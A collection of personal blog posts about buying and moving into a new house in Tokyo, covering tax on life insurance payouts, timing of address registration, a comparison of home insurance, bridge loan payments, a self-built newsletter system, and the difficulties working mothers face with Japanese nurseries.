HEMS and any of the smart home - I was told this will be enabled soon via the app. I might ask about it again if it doesn’t work in a week or so

Entrance door

During the constructions they were using the construction keys to open the door (these look like regular keys, but they are different from the final keys). As part of the handover, I got to open the sealed bag of the final keys, then use them to lock and unlock the door once. After this the constructions keys no longer worked (we verified this).

We also got the radio keys as an additional option: so we can keep the key in our pocket and simply press a button on the door to lock/unlock it (similar to how modern cars work). We were told to never leave the keys near the door even inside, as if the door detects them, then anyone can open the door even from outside. The best is to place them in a Faraday cage box that blocks all radio waves, so we will get one of those. (This is also nice for the car’s key, as relay attacks are becoming common even in Japan.)

Minor mechanical equipments

We also checked how the locks on the windows work, how the insect screens open, how the cloth lines can be used, how the door to the loft storage opens, and how the underfloor storage worked. No surprises, more like making sure we will be able to use everything from day 1.

We also got the manuals and the warranty papers for all the equipment. Since we went with a custom kitchen we didn’t get any explanation about that (other than to please check and follow the manuals).

I had one more extra question about how to remove the door of one of the built-in closets, so they showed me. (Initially we will use one of the kids’ room as family closet, so we don’t need the door.) It doesn’t need any tools, just un-clip the door on the bottom, then on the top, and move it. But it’s heavy.

Tax on life insurance payouts in Japan

2025-10-30T00:00:00+00:00

A while back I took a look at life insurance in Japan and now I’m getting close to actually buying one. As I was thinking about the coverage to get, I looked into how these payouts are taxed (since I care about the net payouts).

Type of tax depending on the payer and receiver

The type of tax depends on who paid for the insurance, and who receives the money. From the NTA’s site:

Insured person	Insurance premium payer	Beneficiary	Type of Tax
A	B	B	Income tax
A	A	B	Inheritance tax
A	B	C	Gift tax

In my case I want to make sure my family has money in case my untimely demise, so the insured is me and the beneficiary is my wife. If my wife pays for the insurance, then the payout is taxed as income. If I pay for the insurance then the payout is taxed as inheritance. The latter has generally a lower rate (though it depends on the size of the estate), so I should be paying for the insurance.

Type of insurance

In my earlier post I ruled out whole life insurance (終身保険), and was thinking about term life insurance (定期保険) or income protection insurance (収入保障保険). Both have a fixed time period (e.g. 25 year from now) and if I die during that time, then they pay. If I’m still alive after 25 years, then they don’t pay anything. This keeps the premiums low compared to whole life insurance.

The difference between term life insurance and income protection insurance is their payout method: term life insurance pays a lump sum (e.g. 10 million yen) at the time of death. Income protection insurance pays a fixed monthly amount (e.g. 150,000 yen) until the end of the coverage (so e.g. if it’s a 25 year term and the person dies after 15 years, then it pays for the remaining 10 years). This monthly payment method is called 年金 in Japanese (same word as pension).

We have seen earlier that the term life insurance will get taxed as inheritance: e.g. if the payout is 10 million yen, it will get added to the estate (all the other things being inherited) and taxed together.

The income protection insurance is taxed a bit differently. The thinking goes like this: instead of the monthly payments, let’s consider that the insurance pays a lump sum, then the receiver buys a product that pays the pension payments (e.g. 150,000 yen/month for the next 10 years). The end result of this is the same, but it can be taxed separately as inheritance and then as interest/gains on the monthly payments.

So at the time of death they calculate the surrender value equivalent of the pension (解約返戻金相当額), essentially how much the current value of the future monthly payments are (or how much the insurance company would pay if we would cancel the contract, or how much it would cost to buy a similar pension). This part gets taxed as inheritance.

Source is this NTA site saying:

年金受給権が相続税の課税対象となるときの価額の評価は、相続税法第24条または第25条の規定に基づき解約返戻金相当額などにより評価します。

The monthly payments get split into principal and interest portions (part is just giving back the original price, part is the interest). The principal is tax free and the interest/gains get taxed as misc income. Exact calculation is here but one thing to keep in mind is that the taxable portion increases as time goes (since bigger portion of the payment is considered interest).

Calculating the present value of monthly payments

This NTA guide goes into more details on this and says:

定期金給付事由が発生している定期金に関する権利については、 ①解約返戻金の金額、 ②定期金に代えて一時金の給付を受けることができる場合には一時金の金額又は ③給付を受けるべき金額の1年当たりの平均額を基に一定の方法で計 (以下、「予定利率による金額」といいます。)のうちいずれか多い金額により評価することとされました。

Rights related to annuities for which an annuity payment event has occurred will be valued at the greater of: (1) the amount of the surrender value; (2) the amount of a lump sum if a lump sum payment is available in lieu of an annuity; or (3) calculated using a certain method based on the average annual amount of the amount to be paid (hereinafter referred to as the “amount based on the assumed interest rate”).

Option 3 calculates the present value of the annuity by decreasing the value of future payments by the interest rate (e.g. receiving 105,000 yen next year has a present value of 100,000 yen, if the interest rate is 5%).

I believe the interest rate used here is 基準年利率 (base annual interest rate) which is 0.5-2% in 2025 (depending on the term: short term is less, long term is more).

This is important because if the insurance provider doesn’t offer a surrender or lump sum option, then it falls back to this calculation.

At 2% interest and 10 year of 150,000 yen/month of payments the present value is calculated (using the formula from the earlier guide):

(1-(1/(1+r)^n)) / r = (1-(1/((1.02)^10)))/0.02 = 8.98

r: interest
n: number of years

150,000 yen a month is 150,000*12=1.8 million yen per year, so 1.8*8.98=16.16 million yen is the present value.

Tax on the monthly payments

Continuing the above example: for the 18 million yen overall payout (150,000 yen per month for 10 years) we paid inheritance tax on 16.16 million yen. This is 89.77%. From the NTA site this makes it fall into the “Inheritance tax assessment ratio of 89-92%” category which corresponds to a taxable portion of 8%.

So out of the 18 million yen overall payment, 8% of it, so 18*0.08=1.44 million yen will be subject to income tax as misc income.

This gets split between the years like this:

First year the taxable portion is 0, then 1 unit, then 2 units, etc. Over 10 years the overall number of units is 1+2+3+4+5+6+7+8+9=45, so each unit corresponds to 1,440,000/45=32,000 yen of taxable income. So over the years the taxable portion goes like this:

Year	Money received	Taxable portion
1	¥1,800,000	¥0
2	¥1,800,000	¥32,000
3	¥1,800,000	¥64,000
4	¥1,800,000	¥96,000
5	¥1,800,000	¥128,000
6	¥1,800,000	¥160,000
7	¥1,800,000	¥192,000
8	¥1,800,000	¥224,000
9	¥1,800,000	¥256,000
10	¥1,800,000	¥288,000

The taxable portion is taxed at the marginal tax rate. So even if someone makes between 9-18m yen per year (33% national tax + 10% local tax), in the last year they will still only pay 288,00 yen*0.43=123,840 yen tax and receive 1,676,160 yen (139,680 yen per month instead of the first year’s 150,000 yen). Prior years will be taxed even less.

Conclusion

If I pay for my own life insurance, then the payout will get taxed as inheritance with the rest of estate. For lump sum payment, that’s the end of it. For monthly payments, there is a bit more calculations, but most of it will get taxed this way, the rest as misc income as it gets payed out (even at higher marginal tax rates the monthly payments get taxed less than 10%).

Sources

When to register the new address when moving into our new house

2025-10-24T00:00:00+00:00

We are building our house in Tokyo, and as the construction is coming to an end, we had to decide when to update our address at the city hall.

Background

Everyone living in Japan is required by law to register their address at the local city hall within 14 days of moving. If moving within Japan, then first one needs to go their old city hall, register their intent of moving out, receive the moving out certificate, bring that to the new city hall and register the new address.

Moving out paperwork can be handled up to 2 weeks before the moving date. Moving in has to be done from the day of moving to within 2 weeks.

No proof is required for the address (e.g. no need to show the rental contract), but registering a fake address is against the law.

The registered date of the moving should be the actual date of the move (and the 2 week grace period should provide enough buffer to handle the paperwork).

According to the mortgage comparison site, mogecheck.jp the penalties are severe:

転出届・転入届・転居届の提出は、住民基本台帳法で定められている義務です。行政が提供する各種サービスの利用にも関わります。そのため期限内に届出を提出しなければ『5万円以下の過料』が科されるルールです。

また引っ越し前に新住所へ転入届や転居届を出すと、公務員に対する嘘の申し立てを行った違法行為とみなされます。届出が嘘だと判明すると『5年以下の懲役または50万円以下の罰金』が科される可能性があります。

Submitting a notification of moving out (転出届), moving in (転入届), or change of address within the same municipality (転居届) is an obligation stipulated by the Basic Resident Registration Act. It also affects your ability to use various administrative services. Therefore, if you fail to submit the notification within the required period, you may be subject to a civil fine of up to 50,000 yen.

In addition, if you submit a notification of moving in or change of address before actually moving, it is considered an illegal act — a false statement to a public official. If it is found that the notification was false, you may face imprisonment of up to 5 years or a fine of up to 500,000 yen.

(I’m not a lawyer, so can’t confirm if this is true or not.)

The issue

When moving from a rental to a rental, there is no issue: it is easy to follow the law and use the actual moving date as the official moving date.

However when buying a house, another system comes into play: the real estate registry (不動産登記簿上). This has the name and address of the owner of each parcel of land (and information about buildings and mortgages as well). So theoretically the process of buying a new home should go like this:

Decide to buy a place, make the offer, get accepted, finalize the mortgage
Go to the bank with the seller, sign the paperwork, start the mortgage. The judicial scrivener (either from the seller, the real estate agent, or the bank) handles the real estate registry changes (new owner and mortgage). The owner’s address is registered as their old address
Move to the new home, update the address at the city hall
Update the real estate registry to the new address

(When buying land and then building a house the steps are slightly more complex, but after the house is ready, there is still a step to go to the bank to finalize the house-part of the mortgage, and there is a judicial scrivener there to update the mortgage and building information on the registry.)

To help the new owner not have to worry about updating the real estate registry, many banks recommend to update the address at the city hall before the mortgage finalization. This way the judicial scrivener can use the new address for the real estate registry, and thus the buyer don’t need to do anything. (Essentially do step 3 before step 2 and skip step 4.)

This is technically illegal, as no seller allows to move-in before finalizing the mortgage, so the actual moving can’t happen before that. However it is very common to do it, e.g. the real estate site, Home’s says:

住所変更を行うタイミングとしては、住宅ローンの契約（金銭消費貸借契約）を結ぶタイミングが理想とされ、契約を行う前に住民票を移しておくのが理想的です。… ここで現住所に住民票があるまま契約すると、新居を登記する際に住所に変更が生じ、複数に渡り登記を行わなくてはいけなくなります。この際、登記手続きを司法書士に依頼すると、その報酬として1～2万円程度の費用が必要となります。

The ideal timing to change your registered address is when you sign the housing loan agreement (the money lending and borrowing contract). Ideally, you should move your residence registration (jūminhyō) before signing the contract. If you sign the contract while your resident record still shows your old address, then when you register ownership of your new home, the address will have changed — meaning you’ll need to go through multiple registration procedures. In that case, if you hire a judicial scrivener (司法書士) to handle the registrations, you’ll need to pay a fee of around 10,000 to 20,000 yen as compensation.

But they also note to ask your city hall if they are cool with this.

Meanwhile the above mentioned mogucheck.jp article strongly advises against updating your address before the move, stating the penalties and also saying that you might miss important mail from the government if you don’t actually live at the new address yet.

Other sites and people in this reddit thread all suggest that changing the address before signing the mortgage is very common practice, and never prosecuted. This makes sense: the government offices only care about having correct records, and a few days difference is not something they (usually) mind.

Our city hall

We called our city hall to ask their advice. They told us that legally it is not okay to update the address before the move, but people still often do it, and the city hall has no way of checking when we actually move, so… Essentially suggesting that we can go ahead with it, but it’s still in a legal gray zone (they used the gray zone expression, but I don’t actually think this is gray. The law is clear, this is illegal, however it is almost never prosecuted, so it is fine.)

Our decision

We decided to only update our address after we actually move. This was done to stay on the legal side of things, and also because we have other ongoing things with the nursery that work out better this way.

This does mean though that I will need to update the real estate registry after we move, and I will write a separate post about that.

Home insurance in Japan

2025-10-22T00:00:00+00:00

We are building our house in Tokyo, and as the construction is coming to an end, we looked into home insurance.

Is it mandatory?

No, home insurance is not mandatory in Japan, although the mortgage lender might require it (source). Our bank (SMTB, 三井住友信託銀行) requires it for the mortgage.

Earthquakes are special

There are two major types of coverage: earthquake, and everything else. The reason for this distinction is that if a big earthquake would to hit a major city (e.g. Tokyo), then insurance providers could face bankruptcy. So the government re-insures the earthquake insurances, however as a result of this, they also enforce some additional rules (source):

earthquake insurance can only be bought together with fire insurance
coverage is limited to 30-50% of the coverage of the fire insurance. This means that while fire insurance might pay the entire value of the house, earthquake insurance will only pay half or less
fire, tsunami, vulcanic eruptions, etc. that happen as a result of an earthquake will be covered by the earthquake insurance (with the lower limits)
pre-defined damage classifications and corresponding payouts (e.g. partial loss of 3-20% will pay 5% of the insured value)
if the overall (country-wide) damage is truly huge (exceeds a government defined amount based on the 1923 Great Kanto Earthquake), then all payouts will be scaled down by the same percentage

This does mean that if your house gets destroyed in an earthquake, the insurance won’t cover the cost of rebuilding. Some insurance companies offer additional insurance to bring the coverage up to 100%, but those can be expensive, and as they are not part of the government reinsured scheme, they might not get paid if the insurance company becomes insolvent.

Fireproof houses

Since fire insurance is the mandatory, basic block of the home insurance, a lot depends on how fireproof the house is. This depends on the building structure (建物の構造). For the calculation there is a common flowchart used by many websites:

Which comes down to the following for single-family houses:

Are the pillars “Concrete structure” or “Steel frame structure”?
- Yes → T-Structure (Fire-resistant Structure)
- No → Is it fire-resistant (耐火建築物), semi-fire-resistant (準耐火建築物), or quasi-fire-resistant by ministerial ordinance (省令準耐火)?
  - Yes → T-Structure (Fire-resistant Structure)
  - No → H-Structure (Other Structures)

All Ichijo houses are “quasi-fire-resistant by ministerial ordinance” (省令準耐火) so we fall into the T-Structure category resulting in a lower insurance premium.

Ichijo introduced insurance (Tokyo Marine)

Ichijo sent us a letter back in May (around the time they started building the foundation) telling us that we don’t need to worry about home insurance, they will introduce a great deal for us at a later time. It felt a bit too much to send a paper letter just for this, but I guess they had people ask about it, or get their own insurance before the introduction.

Then in August (so about 2.5 months before the house was ready) we got the details in the mail: red big letters saying that we will save 80% thanks to this great deal. The insurance company is 東京海上日動, Tokyo Marine Nichido one of the 3 big non-life insurance companies of Japan (三メガ損保).

Details of the quote:

Insured amounts for fire insurance (everything other than earthquake)
- House: 35.6 million yen
- Personal belongings: 5 million yen
Insured amounts for earthquake (half of the above)
- House: 17.8 million yen
- Personal belongings: 2.5 million yen
Length: 5 year
Deductible (amount to pay out of pocket): 0 yen, except for damage caused by other people (neighbor, break-in) or ourselves. These have a deductible of 50,000 yen

They included 3 potential plans. All amounts are for the full 5 years to be paid at once at the start.

Name of the plan	Content	Price (5 year)
Basic plan (基本しっかりプラン)	Fire, wind, water (flooding), and earthquake damages.	230,200 yen
Solid and secure plan (がっちり安心補償プラン)	The above and also damages by other people - break-ins, neighbor damaging your place (feels more relevant for apartments)	238,880 yen
Complete peace of mind plan (まるごと安心補償プラン)	The above and damages by ourselves (e.g. dropping an expensive vase, breaking the wall when carrying heavy things)	249,430 yen

The plans are not that different in price, but also the coverage doesn’t really increase (remember, the additional coverages of #2 and #3 all come with a 50,000 yen deductible).

Long phone calls

A few weeks after receiving the letter with the above information, I got a phone call from Tokyo Marine wanting to discuss the insurance. It took about 40 minutes mainly because both me, my wife, but also the insurance person was unprepared (e.g. I was surprised by earthquake insurance covering only half and wanted to know the reason, which the person didn’t know).

One optional extra that I wanted to add was the personal liability insurance (個人賠償責任補償特約). This covers cases where someone from my family injures another person or causes damage to their property (e.g. kids dropping something in a store, breaking a friend’s TV, scratching a car). I was told that this costs 10,050 yen (coverage limit of 100 million yen) or 11,300 yen (without limit) for the 5 years. Pretty reasonable. So I asked them if I can just add this when I scan the QR code on the paper to apply for the insurance. I was told no, they will have to send me a new paper letter with a new QR code. On the QR code I can only pay for the insurance detailed in the letter.

We asked if insurance claims are also handled over the phone, and they told us that no, they have a website for that. They also said that generally they pay the insurance claims within 30 days, but if there is a major earthquake in Tokyo, then it would likely take longer.

Our address wasn’t finalized yet, so they asked if they could call us a week later to get that updated (again, sending another letter with the new contract). They said they can’t do this via e-mail, only on the phone, so we agreed. Second phone call also took longer than 20 minutes.

By this point my wife was pretty unhappy with the whole process: having mostly pointless long phone calls, having to reissue the quote on paper for all minor change, etc. I was also concerned that this is the process where they want to take our money, and if this process is so bad, then imagine the insurance claims process where we are trying to take their money. I have very little hope that it would be more user friendly.

Later they called us a third time. The caller person was different, and he was okay to send us the new quote via email this time, so maybe we just got unlucky with the first person? Still, we were loosing confidence in them.

Kakaku to the rescue

Similar to my car insurance experience I took a look at 価格.com, the popular price comparison website. On their home insurance section I searched for the same content as we got from Tokyo Marine:

And the results didn’t look very good:

Was the Ichijo-special Tokyo Marine offer actually a good deal? It was the cheapest but not by a big margin, so I decided to take a look on the insurance website to see if I can remove some unnecessary coverage and get it down to be competitive with Tokyo Marine.

Sony insurance

I had great experience with Sony travel insurance in the past (and also this was the cheapest company that I recognized the name of), so I decided to check them out. Kakaku also listed that they pay claims within 2 business days in general (4 business days in some cases), which is much better than the 30 day promise of Tokyo Marine.

I go through the Sony insurance wizard and get an estimate of 201,420 yen (for the full, everything included plan). How did the Kakaku 336,783 yen go down this much? I believe it’s because Kakaku didn’t ask for the earthquake resistance of the building, and since Ichijo houses have the highest (level 3) earthquake resistance, that saves 50% of the earthquake insurance part of the quote.

Make earthquake insurance cover 100%

Sony has the additional option to increase the earthquake coverage to 100% (technically it is a separate insurance that pays out the same amount as the earthquake insurance if at least half the house is destroyed). The cost of this is an extra 182,290 yen for 5 years, almost doubling the price of the insurance.

Since our house is pretty earthquake and fire resistant, we decided not to take this. (Even if a big earthquake would to hit, it is unlikely that our house would get damaged to an extent where we would need this payout. If there is only minor damage, then both the cost of fixing and the insurance payout are lower, and we can cover the other half of the cost out-of-pocket.)

Fine-tuning

We don’t really have expensive belongings, so decided to limit the coverage to the house-only (the original quote had a coverage of 5 million yen for things inside the house). The site also showed us the breakdown cost of each option. This gave us the option to fine-tune the coverage and get what we think is necessary.

In the end we decided to get these:

Coverage	Premium for 5 year	Notes
Earthquake (incl. volcanic eruptions and tsunami)	114,900 yen	Required by our bank
Fire, lightning, rupture/explosion	9,445 yen	Mandatory
Wind, hail, snow	6,837 yen
Water (typhoon, storm, floods, landslides)	32,014 yen	We are not in a flood zone, but included it for typhoon and storm coverage
Water damage from burst pipes, collision with external objects, vandalism	4,966 yen	Included it for a potential leaking washing machine or burst pipes
Break-in	720 yen	It was cheap
Personal liability compensation (for the entire family, up to 300 million yen)	7,161 yen

We skipped on the following options:

Option	Premium for 5 year	Reason
Increasing earthquake insurance to 100%	182,290 yen	Too expensive; major damage unlikely even if a ‘big one’ hits
Extra insurance for fire spreading from our house to others	3,650 yen	House is fire-resistant; neighbors not close
Damage or stains from our own mistakes (walls, furniture, etc.)	20,441 yen	Has 50,000 yen deductible; We don’t own expensive items
10% extra payout for any insurance payout	3,290 yen	Up to 1 million yen; Feels unnecessary

We got an additional 500 yen discount for agreeing to only get the documents electronically.

This brought our end price to 175,633 yen for the 5 years, saving us 55,000-75,000 yen compared to the quote from Tokyo Marine.

Documents for the application

During the application process Sony asked for 3 documents to upload:

Documents proving building information (建物情報を証明する書類):
- Confirmation notice and confirmation certificate (確認通知書・確認済証)
Documents proving fire resistance (耐火性能を証明する書類). One of the following:
- Building confirmation application form (建築確認申請書)
- Design specifications, blueprints, etc. (設計仕様書・設計図面など)
  - Documents issued by the construction company, house manufacturer, or seller that indicate fire resistance. Please note that these documents cannot be used if the main structural components of the building are fire-resistant or semi-fire-resistant. (施工業者・ハウスメーカーまたは販売者が発行した書類のうち、耐火性能を示す記載があるものです。なお、建物の主要構造部が「耐火構造」「準耐火構造」等の場合はご利用いただけません。)
- Building structure (fire resistance standard) certificate (建物構造（耐火基準）証明書)
  - This document is created by having construction companies and home builders fill out the insurance company’s designated form. (施工業者・ハウスメーカーに、当社所定の用紙を記入いただいて作る書類です。)
- Existing insurance policy from another company (他社の保険証券等) - when switching from an existing insurance
Documents proving eligibility for earthquake insurance discounts (地震保険割引の適用対象を証明する書類). One of the following:
- Housing performance evaluation report (住宅性能評価書)
- Certificate of Compliance for Flat 35S (フラット35Sに関する適合証明書)
- Long-term quality housing technical inspection certificate (長期優良住宅の技術的審査適合証)
- Existing insurance policy from another company (他社の保険証券等) - when switching from an existing insurance

We had the first (Confirmation notice and confirmation certificate) and third (Housing performance evaluation report) already. For the second, we had the Building confirmation application form (建築確認申請書), but that didn’t indicate our house’s fire resistance (quasi-fire-resistant by ministerial ordinance, 省令準耐火), so we couldn’t use it. We also couldn’t find this information on any other document from Ichijo, so we asked them to provide it. (We found another blog where they talk about the same situation.)

Ichijo filled out and sent us the template provided by Sony in a few days, and we attached that to the application.

After finalizing all the inputs and uploading the 3 documents, we were presented with this timeline:

Within 2 days SONY will check the uploaded documents
Then we can choose the payment method
Within 2 days SONY confirms the payment method
We need to pay (in case of credit card, they just charge it so this step is not necessary)
Everything is done

It took them exactly 48 hours for the initial confirmation, then I registered my credit card on the website. The next morning they charged the card and sent the “everything is done “ (契約手続完了) email.

The email said that they will send the insurance certificate by mail. If you chose paperless documents (what we did), then they will send a postcard about the completion. We got the post card the next week.

Timing of the payments for the house, and the bridge loan (つなぎ融資)

2025-10-05T00:00:00+00:00

We are currently building our home in Tokyo with Ichijo. I wrote about the cost of our house before, and in this post I will cover the payment schedule, and how the bridge loan (つなぎ融資) comes into the picture.

Background

We are planning to cover 100% of the land and house with a mortgage (due to the super-low interest rate). The bank gave us the money for the land when we closed on the land, but they only want to give the money for the building once it is ready (so that they have it as a collateral).

However Ichijo (and most other house maker companies) want to get paid in 3 installments:

33% before construction starts (着手金) - Ichijo asks this more than 75 days before the structure is standing (上棟７５日前まで)
33% when the structure is standing (上棟金)
rest when the house is done

For us this meant the following schedule:

1 million yen deposit when signing the contract (January 2024)
10.9 million yen before starting construction (end of April 2025 - almost a month before the actual work began) - this is third minus the 1 million yen deposit
- at the same time they also asked for 800,000 yen for incidentals (government applications, water and electricity connection fees, etc.) - the remainder of this will be refunded 1-2 months after the house is finished. I’m not fully sure why they didn’t just use the deposit for this, but I’m guessing there might be some accounting reasons
11.9 million yen when the structure was standing (middle of July 2025)
11.8 million yen when the house will be ready (end of October 2025)

The bank

The banks generally only want to give you the mortgage when the collateral is there (they don’t want to deal with a builder going bankrupt). In some cases the bank and the building company might have a special partnership, and then the bank might be willing to give the money once the structure is standing, but not earlier (at least I haven’t heard of earlier).

Our bank (住友三井信託銀行) has this type of partnership with Ichijo (一条工務店との提携ローン), however this comes with an extra limitation: the mortgage for the building can’t exceed 110% of the price of the house. This is normally fine, however we had to pay extra for connecting the land to the water pipe (1+ million yen), have the garden construction (2.5+ million), and also wanted to include the loan fee (2.2% - almost 1 million), so being limited to 10% would have meant that we would have had to pay out-of-pocket for half of these.

Thus we decided to keep their regular loan, which doesn’t have the 10% limit, but the bank will only provide it once the house is ready. This is the usual way, and most people don’t have enough cash on hand to pre-pay the house payments, so what’s the solution?

Bridge loan (つなぎ融資)

The solution is to take out another loan to cover the timing difference between the payments to the builder, and the time the mortgage is available. Since here the risk is about the building company going bankrupt, the bank didn’t ask for any major documents from me, and it was all handled through Ichijo. Suprisingly this was done with Mizuho bank (みずほ銀行), a bank other than the mortgage. More on bridge loans on the various bank websites, for example Mizuho.

The bridge loan has a higher risk, so the interest is also higher than mortgage. For us it was 2.025% (compared to the current 0.72% rate on our mortgage), however since it only goes for half year, the actual interest we will pay should be only around 200,000 yen.

[update] Closing calculations

In the end we had a minor delay in the payout of our mortgage so our bank sent the money to Ichijo towards the end of November, and Ichijo paid back the bridge loan the next day.

The bridge loan had the three parts described above, and each of those incurred interest for their respective times charged at the yearly rate of 2.025% prorated to the length of the loan:

Installments	Amount	Interest
End of April	¥11,700,000	¥137,259
Mid July	¥11,900,000	¥86,258
End of October	¥11,800,000	¥18,957
Overall		¥242,474

So in the end we paid 242,474 yen in interest for the bridge loan. In addition, we were also charged 800 yen for for stamp duty (400 yen once, 200 yen twice).

Overall the whole process was handled by Ichijo. We only had to fill out the initial application form (that our Ichijo contact brought to our apartment), and the rest was handled by Ichijo, including paying back the loan.

New notifications system on this blog

2025-10-04T00:00:00+00:00

I’m hosting this blog on GitHub Pages, but wanted to give readers the option to subscribe to new posts. I recently changed how this is done, and I will cover it in this post.

RSS

For tech-savvy people, it was easy to offer an RSS feed: https://szabo.jp/atom.xml. I’m not sure if this came with Jekyll (the engine), or had to be configured separately, but it was easy.

However I also wanted e-mail notifications.

The easy way: use another service

First I decided to use a third-party service to manage the subscriptions and notifications: follow.it. This was very easy for me to setup: just point it to the RSS feed I already had.

However recently I checked the email they were sending out, and it had ads in it. Moreover instead of linking to my site directly, they were first linking to their own site (with more ads) and then that would link to my actual post. I see why they do this (they need money to run their service), but this wasn’t providing the experience I wanted. So I decided to build my own.

Building my own

I have an old-style (Apache, PHP, MySQL) webhosting that comes with some of my domains, so I decided to use that. With the help of ChatGPT I could easily put together the php site to manage the subscriptions, and send out the notifications on new posts. Then I used Claude to further refine it and published it on https://github.com/markszabo/newsletter.szabo.jp.

On a high-level it works like this: the site handles subscriptions (confirmation, unsubscribe functionality) using a table in a MySQL database. When the deploy workflow of this site runs, it triggers the ?action=send-digest API. This looks at the RSS feed, checks if the last post was within 24 hours (to avoid resending an email if I simply modify an older post) and then sends the email for it to the confirmed subscriptions in the database. This does have the limitation of only a single post per 24 hours, and that I can’t edit a post within the first 24 hours, but I can live with those.

If you are interested, you can see the code at https://github.com/markszabo/newsletter.szabo.jp or sign-up on https://newsletter.szabo.jp/.

If you are already a subscriber, I migrated your email to the new system already, so no action is required.

One Child or One Career: Choice for Working Mothers in Japan

2025-09-21T00:00:00+00:00

We had our first child 1.5 year ago in Japan, and she started nursery about a year ago. Now that we are expecting our second kid, it is becoming painfully clear how hard the Japanese system is for working mothers who want to have more than one child. This was especially surprising for me, since the declining birthrate has been a major issue for Japan for decades, and all levels of government is trying to solve it, but still the end result is a system that pushes mothers to choose between career or multiple kids.

Types of work

Since we are talking about working mothers, let’s start by examining the types of work one can be engaged in. (This is based on my experience and doesn’t aim to be an exhaustive list.)

Full time employee (正社員)

Usually considered the best employment option: being a regular, full-time employee of a company. You do your hours, and get the fixed salary, plus the yearly bonus (which is more-or-less guaranteed). As long as you show up, you can’t really be fired.

It often feels that this is treated as the only “real work”. For example when looking for mortgage, any other types of work will make it much harder to get financing and might result in a larger down-payment and higher interest rate. Same for applying for nurseries, or government subsidies: this makes everything the easiest.

Maternity leave (産前産後休業): starts 6 weeks before the due date, and last for 8 weeks after giving birth. Payment is 67% of salary, but it’s exempt from income tax and social insurance contributions, so the take-home pay drops to only 80-90%. Paid by the health insurance not the employer. (source1, source2, source3)

Child care leave (育児休業): up to the first birthday of the child, but can be extended for another year if the child fails to get into nursery (some nurseries will give you a rejection letter if asked, or you can see which place have a long waiting list and simply apply there). Payment is 67% of salary for the first 6 months, then 50% of salary. This is again exempt from income tax and social insurance contributions, so the take-home pay drops to only 80-90% for 6 months, then to 65-70%. (source).

Part time workers (パート、バイト)

These part time workers usually have a fixed term contract or work in a shift-based system where they and the employer decides how much they work. This includes work like cashiers, restaurant staff, but also TA (teacher assistant) work at a university that my wife did during her studies.

No (long-term) fixed hours, you get paid for the hours you work. The company usually handles your taxes (I believe).

Maternity and child care leave: maternity leave can be available, but child care leave requires at least 20h+ per week of work and a contract that runs until the child turns 1.5 years old, so not available for most cases.

Contractor, sole proprietor, freelancer (個人事業主, フリーランス)

This is what my wife does, so I know more about it. You work as much as you want, invoice your clients, deduct business expenses, and file your taxes in February/March.

Maternity and child care leave: none, since you only get paid for work you do.

The work culture issue

So the best is to be a full-time employee, then take the 1-2 year child care leave, right? On face value, yes, that’s essentially the ideal way. However in practice cultural norms make this difficult, especially if one wants to have multiple kids.

The issue comes from the fact that most companies handle child care leave as any other paid leave: they don’t hire a replacement, simply expect the rest of the employees to pick up the extra work. (The inability to fire people, the historically low fluctuation, and the low growth likely also contribute to this: if they would hire someone new, then what would they do when the mother comes back from the leave?) And this is happening in a country where half of the employees use less than half their regular paid vacations (source) partly to not inconvenience their team members (who would need to pick up their work while they are away).

This system turns people against each other: it is understandable that colleagues are not happy for the additional work (e.g. assuming a 5 people team, if one person goes on leave, everyone else has 2 hours extra work per day), however they shouldn’t be mad at the person who got the kid, they should be mad at the company for forcing them to do extra work.

This is also where multiple kids get subsequently more difficult: the team might be okay to pick-up the slack for a year, but being out of work for 2 years, then working for a few months just to go on leave again can easily create a work environment where one doesn’t want to return to.

This system also makes timing difficult: many women feel bad going on maternity leave shortly after joining a company. However if one has worked at a place for a few years, then they likely got good at their job, so leaving then puts more work on their colleagues (who now need to learn all what the person knew).

Moreover in teams where there are multiple people wanting to have kids, sometimes they will have to coordinate their pregnancies in order to not go on maternity leave at the same time.

Doing this is often called マタハラ (short for maternity harassment) and is illegal, but likely hard to prove in court (source1, source2, source3).

The real solution would be a cultural change where companies would stop expecting the team to do the same amount of work when members are on extended leave (or hire contractors to help out during this period). However until then most mothers face a difficult choice between quitting their job altogether (assuming their partner’s income is sufficient) or only have a single child.

The same issue applies for father taking paternity leave too. To combat this, from next month SMBC (one of the major bank) will start mandating at least one month paternity leave and give both the father as well as his team mates 50,000 yen bonus (source). This second part highlights that the team member’s attitude is definitely a contributing factor for not taking parental leave.

Nurseries and kindergartens

The system continues to make the life of working mothers hard when it comes to nurseries. As discussed in my post on nurseries, there is a shortage of nurseries in most major cities, so places are allocated based on need. Licensed nurseries have a point system where the more both parents work the more likely for the kid to get accepted, but even unlicensed nurseries (only the Tokyo licensed types as those receive subsidies from the government) have a mandatory requirement that only kids of working parents can attend (this varies per city, but both Mitaka and Musashino require at least 48 hours of work per month from both parents).

And this is where not being a full-time employee makes things very difficult: the system is set up in a way that points and requirements depend on the hours worked per month, which is easy for regular employees, but hard to measure and prove for freelancers (e.g. here is a form one freelancer had to create to prove their working hours - it has hourly breakdown of the work she did). But whether a proof like this is accepted, is up to the city hall worker you end up talking to. And if it isn’t accepted, your kid might need to stop attending nursery (yes, this is evaluated not only at application time, but also afterwards, and can result in getting your kid kicked out of nursery - at least in the city we live in).

Our case

I’m working as a full time employee, so my situation is easy. However my wife works as a freelancer and was attending university when we had our first child. This actually helped when we were looking for nursery, since being a university student counts as full-time work. However we recently learned that after graduation she should have notified the city hall about her work, or if not working, then our kid should have stopped attending nursery.

At this time she was looking for work, and to our luck she registered at Hello Work (the employment service center), so the city hall considered her job-seeker for 3 months, which made us eligible for nursery.

By that time she found work on her own, however since we were planning our second kid soon, she decided to join as a fixed-term contractor instead of full-time employee (she didn’t want to burn bridges by going on maternity leave within the first year of working at a new place).

She had to make sure this contract run until 2 months before the second kid’s due date, since 2 months before and 3 months after the birth she is considered busy enough to justify the first kid going to nursery. Also during this work she had to prove that she worked at least 48 hours per month to qualify for nursery.

However the way things look right now, there is a chance our first kid will have to stop going to nursery when the second kid turns 3 months old. Musashino city hall told us that for freelancers there is a declaration form which says that they are taking a one year childcare leave but will resume their freelance work afterwards. (Similar to how regular employees can take one year off from work.) If the city accepts this, then our first kid can stay in nursery until the second kid turns one.

Nursery is free in Tokyo, but is it?

Since September 2025 nurseries are free in Tokyo. The way this got implemented is that certified nurseries are simply free (no tuition to pay), and kids attending non-certified nurseries receive a subsidy equivalent to the price of the certified nursery (which for us would cover 80-90% of the fee). Except, in our city this subsidy has a requirement of both parents working 120 hours per month or more (page 57 here - this is from last year but this years rules are the same), which is about 6 hours per weekday, almost full-time.

